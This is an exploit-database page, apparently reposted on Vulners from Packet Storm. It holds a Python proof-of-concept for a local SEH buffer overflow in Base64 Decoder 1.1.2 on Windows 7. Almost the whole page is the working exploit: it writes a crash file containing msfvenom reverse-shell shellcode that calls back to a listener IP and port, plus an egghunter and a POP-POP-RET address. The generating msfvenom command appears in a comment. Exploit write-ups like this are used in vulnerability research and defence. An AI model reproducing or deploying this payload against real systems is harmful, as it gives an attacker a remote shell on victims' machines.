Lucene search

K

Base64 Decoder 1.1.2 Buffer Overflow

🗓️ 29 Mar 2019 00:00:00Reported by Paolo PeregoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Base64 Decoder 1.1.2 Buffer Overflow on Windows

Show more
Code
`#!/usr/bin/env python  
  
# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter  
# Date: 28.03.2019  
# Exploit Author: Paolo Perego - [email protected]  
# Vendor Homepage: http://4mhz.de/b64dec.html  
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip  
# Version: Base64 Decoder 1.1.2  
# Tested on: Windows 7 Professional SP1 x86  
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070  
  
junk="A" * 4  
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b '\x00\x0a'  
buf = "w00tw00t"  
buf += "\xbd\x82\x38\x76\xea\xd9\xcd\xd9\x74\x24\xf4\x58\x2b"  
buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\xea\x36\x94"  
buf += "\x1f\x16\xae\xda\xe0\xe6\x2f\xbb\x69\x03\x1e\xfb\x0e"  
buf += "\x40\x31\xcb\x45\x04\xbe\xa0\x08\xbc\x35\xc4\x84\xb3"  
buf += "\xfe\x63\xf3\xfa\xff\xd8\xc7\x9d\x83\x22\x14\x7d\xbd"  
buf += "\xec\x69\x7c\xfa\x11\x83\x2c\x53\x5d\x36\xc0\xd0\x2b"  
buf += "\x8b\x6b\xaa\xba\x8b\x88\x7b\xbc\xba\x1f\xf7\xe7\x1c"  
buf += "\x9e\xd4\x93\x14\xb8\x39\x99\xef\x33\x89\x55\xee\x95"  
buf += "\xc3\x96\x5d\xd8\xeb\x64\x9f\x1d\xcb\x96\xea\x57\x2f"  
buf += "\x2a\xed\xac\x4d\xf0\x78\x36\xf5\x73\xda\x92\x07\x57"  
buf += "\xbd\x51\x0b\x1c\xc9\x3d\x08\xa3\x1e\x36\x34\x28\xa1"  
buf += "\x98\xbc\x6a\x86\x3c\xe4\x29\xa7\x65\x40\x9f\xd8\x75"  
buf += "\x2b\x40\x7d\xfe\xc6\x95\x0c\x5d\x8f\x5a\x3d\x5d\x4f"  
buf += "\xf5\x36\x2e\x7d\x5a\xed\xb8\xcd\x13\x2b\x3f\x31\x0e"  
buf += "\x8b\xaf\xcc\xb1\xec\xe6\x0a\xe5\xbc\x90\xbb\x86\x56"  
buf += "\x60\x43\x53\xf8\x30\xeb\x0c\xb9\xe0\x4b\xfd\x51\xea"  
buf += "\x43\x22\x41\x15\x8e\x4b\xe8\xec\x59\xb4\x45\xd6\xf3"  
buf += "\x5c\x94\x26\x15\xc1\x11\xc0\x7f\xe9\x77\x5b\xe8\x90"  
buf += "\xdd\x17\x89\x5d\xc8\x52\x89\xd6\xff\xa3\x44\x1f\x75"  
buf += "\xb7\x31\xef\xc0\xe5\x94\xf0\xfe\x81\x7b\x62\x65\x51"  
buf += "\xf5\x9f\x32\x06\x52\x51\x4b\xc2\x4e\xc8\xe5\xf0\x92"  
buf += "\x8c\xce\xb0\x48\x6d\xd0\x39\x1c\xc9\xf6\x29\xd8\xd2"  
buf += "\xb2\x1d\xb4\x84\x6c\xcb\x72\x7f\xdf\xa5\x2c\x2c\x89"  
buf += "\x21\xa8\x1e\x0a\x37\xb5\x4a\xfc\xd7\x04\x23\xb9\xe8"  
buf += "\xa9\xa3\x4d\x91\xd7\x53\xb1\x48\x5c\x63\xf8\xd0\xf5"  
buf += "\xec\xa5\x81\x47\x71\x56\x7c\x8b\x8c\xd5\x74\x74\x6b"  
buf += "\xc5\xfd\x71\x37\x41\xee\x0b\x28\x24\x10\xbf\x49\x6d"  
  
junk += buf  
print "filling with " + str(490-len(junk))  
junk += "A" * (490 -len(junk))  
  
  
junk+="\x90\x90\x90\x90"  
junk+="\x90\x90\x90\x90"  
  
# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b '\x00' -v egg  
egg = ""  
egg += "\xb8\x2e\x04\x6d\x70\xdb\xd5\xd9\x74\x24\xf4\x5a\x2b"  
egg += "\xc9\xb1\x09\x31\x42\x12\x83\xea\xfc\x03\x6c\x0a\x8f"  
egg += "\x85\x16\x93\x85\x99\xd9\xd1\x4b\x0c\xe7\x8d\xa6\xfe"  
egg += "\xdb\x28\x63\x8b\xcc\x8b\xe4\x43\x22\x98\x83\x73\xed"  
egg += "\x15\x7e\xd4\x84\x32\x81\xcc"  
junk += egg  
  
junk += "A"*(620-len(junk))  
junk+="\xeb\x80\x90\x90"  
# POP-POP-RET is on 0x00401414  
junk+="\x14\x14\x40"  
f=open("crash.txt", "w")  
f.write(junk)  
f.close  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 Mar 2019 00:00Current
0.6Low risk
Vulners AI Score0.6
33
.json
Report